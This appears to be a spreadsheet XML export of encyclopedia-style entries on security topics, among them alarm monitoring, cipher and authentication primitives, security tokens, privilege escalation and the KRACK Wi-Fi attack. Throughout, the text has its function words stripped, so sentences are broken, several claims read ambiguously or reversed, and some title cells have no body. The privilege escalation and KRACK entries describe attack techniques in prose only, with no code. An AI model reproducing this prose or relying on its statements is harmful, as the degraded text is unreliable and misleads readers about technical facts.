necessary authorities. short, response all. rural areas nobody hear fire bell burglar siren, lights sounds make much difference, nearest emergency responders arrive late avoid losses. remote alarm systems used connect control unit predetermined monitor sort, come many different configurations. high-end systems connect central station first responder (e.g. police/fire/medical) direct phone wire, cellular network, radio network (i.e. gprs/gsm), path. case dual signaling system options utilized simultaneously. alarm monitoring includes sensors, also communication transmitter itself. while direct phone circuits still available areas phone companies, high cost advent dual signaling comparatively lower cost becoming uncommon. direct connections usually seen federal, state, local government buildings, school campus dedicated security, police, fire, emergency medical department communication possible alarm receiving centre communication directly emergency services permitted). more typical systems incorporate digital cellular communication unit contact central station location) public switched telephone network (pstn) raise alarm, either synthesized voice increasingly encoded message string central station decodes. these connect regular phone system system side demarcation point, typically connect customer side ahead phones within monitored premises alarm system seize line cutting-off active calls call monitoring company needed. dual signaling system would raise alarm wirelessly radio path (gprs/gsm) cellular path using phone line broadband line back-up overcoming compromise phone line. encoders programmed indicate specific sensor triggered, monitors show physical location "zone") sensor list even protected premises, make resulting response effective. example, heat sensor alarm, coupled flame detector area reliable indication actual fire sensor indication itself. many alarm panels equipped backup communication path primary pstn circuit functioning. redundant dialer connected second communication path, specialized encoded cellular phone, radio, internet interface device bypass pstn entirely, thwart intentional tampering phone lines. just fact someone tampered line could trigger supervisory alarm radio network, giving early warning imminent problem (e.g. arson). cases remote building pstn phone service, cost trenching running direct line prohibitive. possible wireless cellular radio device primary communication method. popular solution kind similar principle primary back paths reversed. utilizing radio path (gprs/gsm) primary signaling path quicker pstn also allows huge cost savings unlimited amounts data sent extra expense. broadband alarm monitoring increasing deployment voice technology (voip) driving adoption broadband signaling alarm reporting. many sites requiring alarm installations longer conventional telephone lines (pots), alarm panels conventional telephone dialer capability work reliably types voip service. dial-up analogue alarm panels systems serial/parallel data ports migrated broadband addition alarm server device converts telephone signaling signals data port traffic messages suitable broadband transmission. direct voip (pots port premises terminal) transport analogue alarms without alarm server device problematic audio codecs used throughout entire network transmission path cannot guarantee suitable level reliability quality service acceptable application. response changing public communications network alarm systems often broadband signaling method alarm transmission, manufacturers including reporting capability directly alarm panel products. when internet used primary signaling method critical security life safety applications, frequent supervision messages configured overcome concerns backup power network equipment signal delivery time. typical applications, connectivity concerns controlled normal supervision messages, sent daily weekly. various alarm transmission protocols exist today proprietary. just formats used conventional telephone reporting standardized published, broadband signaling alarm reporting standardized today. 2007, alarm manufacturers developed open standard called dc-09. this standard accepted american national standard, published ansi/sia dc-09-2007. [ref: ansi/sia dc-09-2007] without protocol provides encoding scheme transport mechanism carry data previously defined alarm protocols, including latest contact dc-03 2000 protocols. [ref: ansi/sia dc-07-2001.04] several manufacturers panels receivers reported developing released support dc-09. radio alarm dual signaling dual signaling method alarm transmission uses mobile phone network telephone and/or path transmit intruder, fire personal attack signals high speed protected premises alarm receiving centre (arc). commonly uses gprs gsm, high-speed signaling technology used send receive ‘packets’ data, telephone line addition. option used frequently issues installation configuration high level expertise often required addition alarm installation knowledge. dual signaling communication device attached control panel security installation component transmits alarm arc. number different ways, gprs radio path, radio path telephone line/or chosen. these multiple signaling paths present live time backing minimize exposure property intruders. should fail always form back depending manufacturer chosen three paths working simultaneously time. prior availability dual signaling systems, police keyholders often called premises alarm signal telephone path discover network fault genuine alarm dual paths allow distinction hardware failures genuine attack alarm. this helps eliminate false alarms unnecessary responses. dual signaling helped considerably restoration police response instance phone line dual signaling device continue send alarm calls alternative paths either confirming denying alarm initial path. dualcom pioneered dual signaling 1996. company offered first credible alternative existing alarm signaling setting current standard professional dual path security monitoring. dual signaling firmly regarded standard format alarm signaling duly specified leading insurance companies. listen-in alarm monitoring monitored alarms speaker phones allow central station speak homeowner intruder. this beneficial owner medical emergencies. actual break-ins, speaker phones allow central station urge intruder cease desist response units dispatched. listen-in alarm monitoring also known immediate audio-response monitoring speaking alarm systems alarm monitoring services list services monitored central station expanded past years include: access control; cctv monitoring; alarm verification; environmental monitoring; intrusion alarm monitoring; fire alarm sprinkler monitoring; critical condition monitoring; medical response monitoring; elevator telephone monitoring; hold-up panic alarm monitoring; duress monitoring; auto dialer tests; open close signal supervision reporting; exception reports; passcode management. increasingly, central stations making information available directly users internet secure log-on view create custom reports events themselves. alarm response united states, police respond least million alarm activations year, estimated annual cost $1.8 billion.depending upon zone triggered, number sequence zones, time day, factors, alarm monitoring center automatically initiate various actions. central station operators might instructed call emergency services immediately, first call protected premises property manager determine alarm genuine. operators could also start calling list phone numbers provided customer contact someone check protected premises. some zones trigger call local heating company check system, call owner details room getting flooded. some alarm systems tied video surveillance systems current video intrusion area instantly displayed remote monitor, mention recorded. some alarm systems real-time audio video monitoring technology verify legitimacy alarm. municipalities around united states, type alarm verification allows property protecting placed "verified response" list, allowing quicker safer police responses. first video home security system patented december 1969 inventor marie brown. system used television surveillance. access control bypass codes useful, intrusion alarm system deactivated reconfigured authorized personnel present. authorization indicated number ways, often keys codes used control panel remote panel near entry. high-security alarms require multiple codes, fingerprint, badge, hand-geometry, retinal scan, encrypted-response generator, means deemed sufficiently secure purpose. failed authorizations result alarm least timed lockout prevent experimenting possible codes. some systems configured permit deactivation individual sensors groups. others also programmed bypass ignore individual sensors (once multiple times) leave remainder system armed. this feature useful permitting single door opened closed alarm armed, permit person leave, return. high-end systems allow multiple access codes, even permit used once, particular days, combination users' codes (i.e., escorted). case, remote monitoring center arrange oral code provided authorized person case false alarms, monitoring center assured alarm response unnecessary. access codes, also hierarchy oral codes, say, furnace repairperson enter kitchen basement sensor areas silver vault pantry. there also systems permit duress code entered silence local alarm, still trigger remote alarm summon police robbery. fire sensors isolated, meaning triggered, trigger main alarm network. this important smoke heat intentionally produced. owners buildings fined generating false alarms waste time emergency personnel. false absent alarms united states department justice estimates alarm calls enforcement false alarms.system reliability user error cause false alarms, sometimes called "nuisance alarms." false alarms costly local governments, local enforcement, security system users </t>
  </si>
  <si>
    <t>LILI-128</t>
  </si>
  <si>
    <t>lili-128 lfsr based synchronous stream cipher 128-bit key. november 2000, lili-128 presented nessie workshop. designed simple implement software hardware. 2007, lili-128 totally broken using notebook running matlab 1.61 hours. references</t>
  </si>
  <si>
    <t>LDAP Admin</t>
  </si>
  <si>
    <t>ldap admin free, open-source ldap directory management tool licensed general public license. small compact, ldap admin also highly configurable template extensions. addition common browsing editing functions, ldap admin provides directory management functionality supporting number application-specific ldap objects posix samba groups accounts, postfix objects number active directory objects. also provides xml-based template engine extends application seamless allowing support virtually unlimited number user defined objects. features some features include: browsing editing ldap directories recursive operations directory trees (copy, move delete) modify operations datasets password management management posix groups accounts management samba groups accounts postfix support template support offline browsing editing ldif filesas version templates support javascript vbscript introduced providing dynamic templates. limitations ldap admin runs windows operating systems only. using wine software, apparently possible application linux operating systems. there also linux port (still beta) ldapadmin. also list ldap software references external links official website</t>
  </si>
  <si>
    <t>Phoner</t>
  </si>
  <si>
    <t>KOI-18</t>
  </si>
  <si>
    <t>koi-18 hand-held paper tape reader developed u.s. national security agency fill device loading cryptographic keys, "crypto variables," security devices, encryption systems. read 8-level paper tape, manually pulled reader slot operator. battery powered internal storage, load keys different lengths, including 128-bit keys used modern systems. koi-18 also used load keys fill devices internal storage, kyk-13 an/cyz-10. koi-18 supports ds-102 interface. similar device developed prof. jean-daniel nicoud smaky 1975. references patent 6859537, houlberg, christian borgen, gary "non-volatile memory encryption device", issued 2005-02-22 external links koi-18 diagram</t>
  </si>
  <si>
    <t>Kmc-Subset137</t>
  </si>
  <si>
    <t>open-source kmc-subset137 project implements protocol described "ertms/ects; on-line management fffis" unisig subset-137 ver1.0.0. covers on-line distribution cryptographic keys among management centres authoritative respective domains. also deals exchange management center domain kmac entities. open source library provides simple language application programming interface (api) access parse unisig subset messages. cryptographic part protocol relies open source gnutls library alternatively, discouraged, openssl library). library open-source licensed general public license version 3.0. references prose article copied kmc-subset137 project neat embedded computing, available creative commons attribution-sharealike unported license.</t>
  </si>
  <si>
    <t>SecureCRT</t>
  </si>
  <si>
    <t>securecrt commercial telnet client terminal emulator vandyke software. originally windows product, vandyke later added version 2010 release v6.6 linux version 2011 release v6.7. history securecrt gui-based telnet client terminal emulator originally called crt. first released autumn 1995 vandyke software. originally released premium version support encryption, securecrt later absorbed product entirely. program part line networking software includes securefx, file transfer client capability, vshell, server. securecrt securefx started within combined host information list. separately-sold pack command-line tools (e.g., scp, modeled unix command name) vshell also sold company. offerings commercialware. features graphical user interface support configurable sessions extensive protocol support (ssh1, ssh2, rdp, telnet, telnet ssl, rlogin, serial, tapi) support large number ciphers: aes-128, aes-192, aes-256, aes-128-ctr, aes-192-ctr, aes-256-ctr, twofish, blowfish, 3des, advanced features including public assistant, x.509, smart card gssapi support, forwarding, tunneling protocols, advanced terminal emulation capabilities (vt100, vt102, vt220, ansi, ansi, wyse 50/60, xterm, linux terminals) full unicode support 128,000-line scrollback unlimited logging capabilities scripting support, meaning programmed vbscript, jscript, perlscript, oorexxscript, pythonscript, tclscript, phpscript, variants delphi, rexx, basic, available scripting engines. file transfers available securefx integration fips compliance compatibility securecrt runs windows windows vista windows windows windows also runs windows server series operating systems. windows vista later, 64-bit version available download. securecrt also available linux. export restrictions securecrt developed mexico, therefore subject united states export restrictions. references external links securecrt product page vandyke software</t>
  </si>
  <si>
    <t>Security token</t>
  </si>
  <si>
    <t>security token peripheral device used gain access electronically restricted resource. token used addition place password. acts like electronic access something. examples include wireless keycard opening locked door, case customer trying access bank account online, bank-provided token prove customer claim some tokens store cryptographic keys used generate digital signature, biometric data, fingerprint details. some also store passwords. some designs incorporate tamper resistant packaging, others include small keypads allow entry simple button start generating routine display capability show generated number. connected tokens utilize variety interfaces including usb, near-field communication (nfc), radio-frequency identification (rfid), bluetooth. some tokens audio capability designed vision-impaired people. password types tokens contain secret information used prove identity. there four different ways information used: static password token device contains password physically hidden (not visible possessor), transmitted authentication. this type vulnerable replay attacks.synchronous dynamic password token timer used rotate various combinations produced cryptographic algorithm. token authentication server must synchronized clocks.asynchronous password token one-time password generated without clock, either one-time cryptographic algorithm.challenge–response token using public cryptography, possible prove possession private without revealing key. authentication server encrypts challenge (typically random number, least data random parts) public key; device proves possesses copy matching private providing decrypted challenge.time-synchronized one-time passwords change constantly time interval; e.g., minute. sort synchronization must exist client's token authentication server. disconnected tokens, time-synchronization done token distributed client. other token types synchronization token inserted input device. main problem time-synchronized tokens can, time, become unsynchronized. however, systems, rsa's securid, allow user resynchronize server token, sometimes entering several consecutive passcodes. most also cannot replaceable batteries last years replaced additional cost. another type one-time password uses complex mathematical algorithm, hash chain, generate series one-time passwords secret shared key. each password unguessable, even previous passwords known. open-source oath algorithm standardized; algorithms covered patents. each password observably unpredictable independent previous ones, whereby adversary would unable guess next password even knowledge previous passwords. physical types tokens contain chips functions varying simple complex, including multiple authentication methods. simplest security tokens need connection computer. tokens physical display; authenticating user simply enters displayed number other tokens connect computer using wireless techniques, bluetooth. these tokens transfer sequence local client nearby access point. alternatively, another form token widely available many years mobile device communicates using out-of-band channel (like voice, sms, ussd). still tokens plug computer, require pin. depending type token, computer either read token perform cryptographic operation token's firmware perform operation. related application hardware dongle required computer programs prove ownership software. dongle placed input device software accesses device question authorize software question. commercial solutions provided variety vendors, proprietary (and often patented) implementation variously used security features. token designs meeting certain security standards certified united states compliant fips 140, federal security standard. tokens without kind certification sometimes viewed suspect, often meet accepted government industry security standards, rigorous testing, likely cannot provide level cryptographic security token solutions designs independently audited third-party agencies. disconnected tokens disconnected tokens neither physical logical connection client computer. they typically require special input device, instead built-in screen display generated authentication data, user enters manually keyboard keypad. disconnected tokens common type security token used (usually combination password) two-factor authentication online identification. connected tokens connected tokens tokens must physically connected computer user authenticating. tokens category automatically transmit authentication information client computer physical connection made, eliminating need user manually enter authentication information. however, order connected token, appropriate input device must installed. common types physical tokens smart cards tokens (also called security keys), require smart card reader port respectively. increasingly, fido2 tokens, supported open specification group fido alliance become popular consumers mainstream browser support beginning 2015 supported popular websites social media sites. older card tokens made work primarily laptops. type cards preferred token half thick type iii. audio jack port relatively practical method establish connection mobile devices, iphone, ipad android, accessories. well known device called square, credit card reader android devices. some special purpose interface (e.g. crypto ignition deployed united states national security agency). tokens also used photo card. cell phones pdas also serve security tokens proper programming. smart cards many connected tokens smart card technology. smart cards cheap (around cents) contain proven security mechanisms used financial institutions, like cash cards). however, computational performance smart cards often rather limited extreme power consumption ultra-thin form-factor requirements. smart-card-based tokens contain smart card chip inside provide functionality tokens smart cards. they enable broad range security solutions provide abilities security traditional smart card without requiring unique input device. from computer operating system's point view token usb-connected smart card reader non-removable smart card present. contactless tokens unlike connected tokens, contactless tokens form logical connection client computer require physical connection. absence need physical contact makes convenient connected disconnected tokens. result, contactless tokens popular choice keyless entry systems electronic payment solutions mobil speedpass, uses rfid transmit authentication info keychain token. however, various security concerns raised rfid tokens researchers johns hopkins university laboratories discovered rfid tags could easily cracked cloned.another downside contactless tokens relatively short battery lives; usually years, compared tokens last years. some tokens however allow batteries changed, thus reducing costs. bluetooth tokens bluetooth energy protocols serve long lasting battery lifecycle wireless transmission. transmission inherent bluetooth identity data lowest quality supporting authentication. bidirectional connection transactional data interchange serves sophisticated authentication procedures.however, automatic transmission power control antagonizes attempts radial distance estimates. escape available apart standardised bluetooth power control algorithm provide calibration minimally required transmission power.bluetooth tokens often combined token, thus working connected disconnected state. bluetooth authentication works closer feet meters). when bluetooth link properly operable, token inserted input device function. another combination smart card store locally larger amounts identity data process information well. another contactless token combines secure storage tokenized release fingerprint credentials.in mode operation sign-off requires care token mechanically coupled plug. advantage bluetooth mode operation option combining sign-off distance metrics. respective products preparation, following concepts electronic leash. tokens near-field communication (nfc) tokens combined bluetooth token operate several modes, thus working connected disconnected state. authentication works closer foot (0.3 meters). protocol bridges short distances reader bluetooth connection serves data provision token enable authentication. also bluetooth link connected, token serve locally stored authentication information coarse positioning reader relieves exact positioning connector. single sign-on software tokens some types single sign-on (sso) solutions, like enterprise single sign-on, token store software allows seamless authentication password filling. passwords stored token, users need remember passwords therefore select secure passwords, secure passwords assigned. usually tokens store cryptographic hash password token compromised, password still protected. programmable tokens programmable tokens marketed "drop-in" replacement mobile applications google authenticator (miniotp). they used mobile replacement, well parallel backup. vulnerabilities loss theft simplest vulnerability password container theft loss device. chances happening, happening unawares, reduced physical security measures locks, electronic leash, body sensor alarm. stolen tokens made useless using factor authentication. commonly, order authenticate, personal identification number (pin) must entered along information provided token time output token. attacking system allows users authenticate untrusted network (such internet) vulnerable man-in-the-middle attacks. type attack, fraudster acts "go-between" user legitimate system, soliciting token output legitimate user supplying authentication system themselves. since token value mathematically correct, authentication succeeds fraudster granted access. citibank made headline news 2006 hardware-token-equipped business users became victims large ukrainian-based man-in-the-middle phishing attack. breach codes 2012, prosecco research team inria paris-rocquencourt developed efficient method extracting secret several pkcs cryptographic devices, including securid 800. these findings documented inria technical report rr-7944, hal-00691958, published crypto 2012. digital signature trusted regular hand-written signature, digital signature must made private known person authorized make signature. tokens allow secure on-board generation storage private keys enable secure digital signatures, also used user authentication, private also serves proof user’s identity. tokens identify user, tokens must kind number unique. approaches fully qualify digital signatures according national laws. tokens on-board keyboard another user interface cannot used signing scenarios, confirming bank transaction based bank account number funds transferred also authentication authenticator hardware security module identity management initiative open authentication mobile signature multi-factor authentication mutual authentication one-time single sign-on software token references general references external links media related tokens wikimedia commons oath initiative open authentication</t>
  </si>
  <si>
    <t>Poly1305</t>
  </si>
  <si>
    <t>poly1305 cryptographic message authentication code (mac) created daniel bernstein. used verify data integrity authenticity message. variant bernstein's poly1305 require standardized internet engineering task force 8439. description original proposal, poly1305-aes, uses (forward) encryption function source pseudorandomness, computes 128-bit byte) authenticator variable-length message. addition message, requires 128-bit key, 128-bit additional (with effective bits), 128-bit nonce must unique among messages authenticated key. message broken 16-byte chunks become coefficients polynomial evaluated modulo prime number 2130−5. authentication code polynomial evaluation, plus pseudorandom value computed passing nonce block cipher. name poly1305-aes derived polynomial evaluation, 2130−5 modulus, aes. nacl, poly1305 used salsa20 place aes, used chacha20 variant same. google selected poly1305 along bernstein's chacha20 symmetric cipher replacement tls/ssl, used internet security. google's initial implementation used securing https (tls/ssl) traffic chrome browser android phones google's websites. chacha20/poly1305 standardized 7539, 7905, 8405. shortly google's adoption tls, chacha20 poly1305 support added openssh chacha20-poly1305@openssh.com authenticated encryption cipher. subsequently, made possible openssh remove dependency openssl compile-time option. security security poly1305-aes close underlying block cipher algorithm. consequently, attacker break poly1305-aes break aes. instance, assuming messages packets 1024 bytes; attacker sees messages authenticated poly1305-aes key; attacker attempts whopping forgeries; attacker cannot break probability then, probability least 0.999999 rejected speed poly1305-aes computed high speed various cpus: n-byte message, 3.1n athlon cycles needed, example. author released optimized source code athlon, pentium pro/ii/iii/m, powerpc, ultrasparc, addition non-optimized reference implementations public domain software. implementations below list cryptography libraries support poly1305: botan bouncy castle crypto++ libgcrypt libsodium nettle openssl libressl wolfcrypt gnutls mbed matrixssl also chacha20-poly1305 aead scheme combining stream cipher chacha20 variant poly1305 references external links poly1305-aes reference optimized implementation author bernstein fast poly1305 implementation github.com</t>
  </si>
  <si>
    <t>LEAF Project</t>
  </si>
  <si>
    <t>leaf (linux embedded appliance framework) project collection linux distributions began fork linux router project (lrp) "linux-on-a-floppy" distribution. most users distributions primarily interested router firewall functions, particularly combined convenience major features general linux distributions shells, packet filtering, servers, services, file servers, webmin like. leaf common choice commercial routers insufficiently flexible secure, unattractively nonconformant open source philosophy. characteristics leaf capable running powerful firewall several ancillary services computer hardware generally considered obsolete, workstations hard disk. leaf intended work well read-only storage media, write-protected floppy drives optical discs. distribution sizes range single floppy disk several hundred megabytes. leaf distributions typically include software designed economical executable size, uclibc, busybox, dropbear, shorewall. leaf's origins debian sarge, though many boot processes daemon control mechanisms modified heavily. also list router firewall distributions alpine linux references external links leaf linux embedded appliance framework project documentation leaf linux embedded appliance framework project homepage sourceforge leaf linux embedded appliance framework page ohloh article lwn.net discussing lrp/leaf example underappreciated free software article network world listing leaf free open source projects pros love"</t>
  </si>
  <si>
    <t>KPackage</t>
  </si>
  <si>
    <t>kpackage kde's package manager frontend. supported bsd, debian, gentoo, slackware packages. provided management upgrade existing packages installation acquirement packages. additionally, provided functionality help manage package caches. kpackage part kdeadmin, developed kde.org. also packagekit synaptic (software) ubuntu software center references external links kpackage user wiki</t>
  </si>
  <si>
    <t>KR advantage</t>
  </si>
  <si>
    <t>Privilege escalation</t>
  </si>
  <si>
    <t>privilege escalation exploiting bug, design flaw, configuration oversight operating system software application gain elevated access resources normally protected application user. result application privileges intended application developer system administrator perform unauthorized actions. background most computer systems designed multiple user accounts, abilities known privileges. common privileges include viewing editing files modifying system files. privilege escalation means users receive privileges entitled these privileges used delete files, view private information, install unwanted programs viruses. usually occurs system allows security bypassed alternatively, flawed design assumptions used. privilege escalation occurs forms: vertical privilege escalation, also known privilege elevation, lower privilege user application accesses functions content reserved higher privilege users applications (e.g. internet banking users access site administrative functions password smartphone bypassed.) horizontal privilege escalation, normal user accesses functions content reserved normal users (e.g. internet banking user accesses internet bank account user vertical this type privilege escalation occurs user process able obtain higher level access administrator system developer intended, possibly performing kernel-level operations. examples cases, high-privilege application assumes would provided input matching interface specification, thus validate input. then, attacker able exploit assumption, order unauthorized code application's privileges: some windows services configured local system user account. vulnerability buffer overflow used execute arbitrary code privilege elevated local system. alternatively, system service impersonating lesser user elevate user's privileges errors handled correctly user impersonated (e.g. user introduced malicious error handler) under legacy versions microsoft windows operating system, users screensaver runs local system account account replace current screensaver binary file system registry therefore elevate privileges. certain versions linux kernel possible write program would current directory /etc/cron.d, request core dump performed case crashes killed another process. core dump file would placed program's current directory, /etc/cron.d, cron would treated text file instructing programs schedule. because contents file would attacker's control, attacker would able execute program root privileges. cross zone scripting type privilege escalation attack website subverts security model browsers, thus allowing malicious code client computers. there also situations application high privilege services incorrect assumptions client could manipulate services. application execute command line shell commands could shell injection vulnerability uses unvalidated input part executed command. attacker would able system commands using application's privileges. texas instruments calculators (particularly ti-85 ti-82) originally designed interpreted programs written dialects ti-basic; however, users discovered bugs could exploited allow native z-80 code calculator hardware, released programming data support third-party development. (this carry arm-based ti-nspire, jailbreaks using ndless found still actively fought texas instruments.) some versions iphone allow unauthorised user access phone locked. jailbreaking jailbreak tool used perform breaking chroot jail unix-like operating systems bypassing digital rights management (drm). former case, allows user files outside filesystem administrator intends make available application user question. context drm, allows user arbitrarily defined code devices well break chroot-like restrictions. term originated iphone/ios jailbreaking community also used term playstation portable hacking; devices repeatedly subject jailbreaks, allowing execution arbitrary code, sometimes jailbreaks disabled vendor updates. systems including iphone, ipad, ipod touch subject jailbreaking efforts since released, continuing firmware update. jailbreaking tools include option install cydia, sileo, installer.app third-party alternatives store, find install system tweaks binaries. prevent jailbreaking, apple made device boot execute checks shsh blobs order disallow uploads custom kernels prevent software downgrades earlier, jailbreakable firmware. "untethered" jailbreak, iboot environment changed execute boot exploit allow submission patched level bootloader hack kernel submit jailbroken kernel shsh check. similar method jailbreaking exists platform smartphones, utilities helloox allow execution unsigned code full access system files. edited firmware (similar hacked firmware used playstation portable) circumvent restrictions unsigned code. nokia since issued updates curb unauthorized jailbreaking, manner similar apple. case gaming consoles, jailbreaking often used execute homebrew games. 2011, sony, assistance firm kilpatrick stockton, sued 21-year-old george hotz associates group fail0verflow jailbreaking playstation (see sony computer entertainment america george hotz playstation jailbreak). android android phones officially rooted either going manufacturers controlled process, using exploit gain root, flashing custom recovery. manufacturers allow rooting process control, allow phone rooted simply pressing specific combinations boot time, self-administered methods. using manufacturers method almost always factory resets device, making rooting useless people want view data, also voids warranty permanently, even device derooted reflashed. software exploits commonly either target root-level process accessible user, using exploit specific phone's kernel, using known android exploit patched newer versions; upgrading phone, intentionally downgrading version. mitigation strategies operating systems users following strategies reduce risk privilege escalation: data execution prevention address space layout randomization make harder buffer overruns execute privileged instructions known addresses memory) running applications least privilege (for example running internet explorer administrator disabled process token) order reduce ability buffer overrun exploits abuse privileges elevated user. requiring kernel mode code digitally signed. patching compilers trap buffer overruns encryption software and/or firmware components. operating system mandatory access controls (mac) selinux horizontal horizontal privilege escalation occurs application allows attacker gain access resources normally would protected application user. result application performs actions user different security context intended application developer system administrator; effectively limited form privilege escalation (specifically, unauthorized assumption capability impersonating users). compares vertical privilege escalation, horizontal requires upgrading privilege accounts. often relies bugs system. examples this problem often occurs applications. consider following example: user access bank account internet banking application. user access bank account internet banking application. vulnerability occurs user able access user bank account performing sort malicious activity.this malicious activity possible common application weaknesses vulnerabilities. potential application vulnerabilities situations lead condition include: predictable session user's http cookie session fixation cross-site scripting easily guessable passwords theft hijacking session cookies keystroke logging also defensive programming hacking consumer electronics illegal number principle least privilege privilege revocation (computing) privilege separation rooting (android hammer references</t>
  </si>
  <si>
    <t>KSD-64</t>
  </si>
  <si>
    <t>ksd-64[a] crypto ignition (cik) nsa-developed eeprom chip packed plastic case looks like key. model number storage capacity kibibits (65,536 bits, kib), enough store multiple encryption keys. most frequently used key-splitting applications: either encryption device ksd-64 alone worthless, together used make encrypted connections. also used alone fill device transfer material, initial seed loading stu-iii secure phone. newer systems, secure terminal equipment, fortezza card security token instead ksd-64. ksd-64 withdrawn market 2014. over million produced 30-year life. operation small device loaded 128·bit sequence different user. when device removed machine, sequence automatically added (mod unique machine, thus leaving stored encrypted form. when reattached, unique machine decrypted, ready operate normal way. analogy automobile ignition close, thus name. lost, user still safe unless finder thief match user's machine. case loss, user gets cik, effectively changing lock cipher machine, gets back business. ignition sequence provided several ways. first crypto-equipment idea (the ky-70), loaded sequence supplied user like item keying material. follow-on application stu-ii) even clever scheme. device simply empty register supplied unique sequence randomizer function parent machine itself. that, time device removed re-inserted, gets brand sequence. effect procedure provide high protection covert compromise wherein thief acquires device, copies replaces unknown owner. next morning (say), user inserts device, receive sequence copied useless thereafter. thief gotten machine night, able net; user attempts start morning thief's device longer work, thus flagging fact penetration occurred. this concept appears particularly attractive office environments physical structures guarding arrangements sufficiently rigorous assure crypto-equipments cannot accessed unauthorized people. references external links article stu-iii jerry proc ksd-64 crypto museum</t>
  </si>
  <si>
    <t>KRACK</t>
  </si>
  <si>
    <t>krack ("key reinstallation attack") replay attack type exploitable flaw) wi-fi protected access protocol secures wi-fi connections. discovered 2016 belgian researchers mathy vanhoef frank piessens university leuven. vanhoef's research group published details attack october 2017. repeatedly resetting nonce transmitted third step wpa2 handshake, attacker gradually match encrypted packets seen learn full keychain used encrypt traffic. weakness exhibited wi-fi standard itself, errors implementation sound standard individual products implementations. therefore, correct implementation wpa2 likely vulnerable. vulnerability affects major software platforms, including microsoft windows, macos, ios, android, linux, openbsd others.the widely used open-source implementation wpa_supplicant, utilized linux android, especially susceptible manipulated install all-zeros encryption key, effectively nullifying wpa2 protection man-in-the-middle attack. version fixed vulnerability.the security protocol protecting many wi-fi devices essentially bypassed, potentially allowing attacker intercept sent received data. details attack targets four-way handshake used establish nonce kind "shared secret") wpa2 protocol. standard wpa2 anticipates occasional wi-fi disconnections, allows reconnection using value third handshake (for quick reconnection continuity). because standard require different used type reconnection, could needed time, replay attack possible. attacker repeatedly re-send third handshake another device's communication manipulate reset wpa2 encryption key. each reset causes data encrypted using values, blocks content seen matched, working backwards identify parts keychain used encrypt block data. repeated resets gradually expose keychain eventually whole known, attacker read target's entire traffic connection. according us-cert: "us-cert become aware several management vulnerabilities 4-way handshake wi-fi protected access (wpa2) security protocol. impact exploiting vulnerabilities includes decryption, packet replay, connection hijacking, http content injection, others. note protocol-level issues, correct implementations standard affected. cert/cc reporting researcher leuven, publicly disclosing vulnerabilities october 2017." paper describing vulnerability available online, formally presented conference computer communications security november 2017. us-cert tracking vulnerability, listed vu#228519, across multiple platforms. following identifiers relate krack vulnerability: cve-2017-13077, cve-2017-13078, cve-2017-13079, cve-2017-13080, cve-2017-13081, cve-2017-13082, cve-2017-13084, cve-2017-13086, cve-2017-13087 cve-2017-13088.some wpa2 users counter attack updating wi-fi client access point device software, devices vendor patches available. however, vendors delay offering patch, provide patches case many older devices. patches patches available different devices protect krack, starting versions: workarounds order mitigate risk vulnerable clients, wpa2-enabled wi-fi access points configuration options disable eapol-key frame re-transmission installation. attackers cannot cause re-transmissions delayed frame transmission, thereby denying access network, provided tdls enabled. disadvantage method that, poor connectivity, reinstallation failure cause failure wi-fi link. continued vulnerability october 2018, reports emerged krack vulnerability still exploitable spite vendor patches, variety workarounds techniques used vendors close original attack. also krøøk ieee 802.11r-2008 problem 802.11r fast transition (ft) wireless security wpa3 references external links krackattacks.com community-maintained vendor response matrix krack</t>
  </si>
  <si>
    <t>LEVIATHAN (cipher)</t>
  </si>
  <si>
    <t>leviathan stream cipher submitted nessie scott fluhrer david mcgrew. seekable stream cipher, means user efficiently skip forward part keystream, much like mode salsa20, unlike ciphers generating contiguous blocks keystream made especially efficient leviathan's unique tree structure based stream generation. leviathan achieves around cycles byte pentium processor. leviathan considered broken distinguishing attacks require bytes output comparable effort. external links leviathan specification (zip file) link dead. available internet archive references</t>
  </si>
  <si>
    <t>Process isolation</t>
  </si>
  <si>
    <t>process isolation different hardware software technologies designed protect process processes operating system. preventing process writing process process isolation implemented virtual address space, process address space different process address space preventing writing onto security easier enforce disallowing inter-process memory access, contrast less secure architectures process write memory process. limited inter-process communication system process isolation, limited (controlled) interaction processes still allowed inter-process communication (ipc) channels shared memory, local sockets internet sockets. scheme, process' memory isolated processes except process allowing input collaborating processes. system policies disallow circumstances. example, mandatory access control systems, subjects different sensitivity levels allowed communicate other. security implications circumstances broad span applications network encryption systematics well distributed caching algorithms. interface-defined protocols basic cloud access architecture network sharing similarly affected. operating systems notable operating systems support process isolation: unix, linux, microsoft windows windows browsers internet explorer used process isolation order allow separate windowed instances browser processes; however, height browser wars, dropped subsequent versions compete netscape navigator (which sought concentrate upon process entire internet suite). this idea process-per-instance would revisited decade afterwards, tabbed browsing became commonplace. google chrome's "multi-process architecture" internet explorer "loosely coupled (lcie)", tabs containing webpages contained within semi-separate os-level processes isolated core process browser prevent crash tab/page crashing entire browser. this method (known popularly multiprocess process-per-tab) meant manage memory processing allowing offending tabs crash separately browser tabs manage security. browsers process isolation google chrome internet explorer later safari mozilla firefox (default since maxthon programming languages erlang (programming language) providing similar concept user space, realizing strictly separated lightweight processes. related technologies virtual memory virtual address space allows memory space isolation. polyinstantiation allows mirrors shared resources, changes process visible process also sandbox (computer security) references</t>
  </si>
  <si>
    <t>Kleo Bare Metal Backup</t>
  </si>
  <si>
    <t>kleo bare metal backup servers free file system cloning program created carroll-net inc. kleo creates all-inclusive backup operating system, device drivers applications. kleo bundled livecd includes tools server recovery. operation kleo graphical wizard file system cloning system. designed disaster-recovery tool, producing complete file system images. event server experiences hard drive failure, livecd booted, previous backup image used recover server point time last backup.kleo backups file system aware backups. unused blocks empty space included reduces size backup image. backup images also passed gzip compress size. even compression, backup images quite large. reason, suitable replacements daily backups typically done whenever significant changes made server's application prior applying service patches hotfixes. supported storage media hard drive usb/firewire drive cifs windows network share server server supported file systems known limitations kleo support ext4 default ubuntu installations destination partition must larger source partition (limitation underlying partimage tool) file format file format written gzipped partimage file. file extension .kb2 backup image broken chunks make possible store backups dvd. also disk cloning list disk cloning software references external links official website download kleo support forum</t>
  </si>
  <si>
    <t>Privilege bracketing</t>
  </si>
  <si>
    <t>computer security, privilege bracketing temporary increase software privilege within process perform specific function, assuming necessary privileges last possible moment dismissing soon longer strictly necessary, therefore ostensibly avoiding fallout erroneous code unintentionally exploits privilege merited. example principle least privilege defensive programming. distinguished privilege separation, much effective security measure separates privileged parts system unprivileged parts putting different processes, opposed switching within single process. known example privilege bracketing debian/ubuntu: using 'sudo' tool temporarily acquire 'root' privileges perform administrative command. microsoft powershell equivalent "just time, just enough admin". also privilege revocation (computing) references</t>
  </si>
  <si>
    <t>Progress Chef</t>
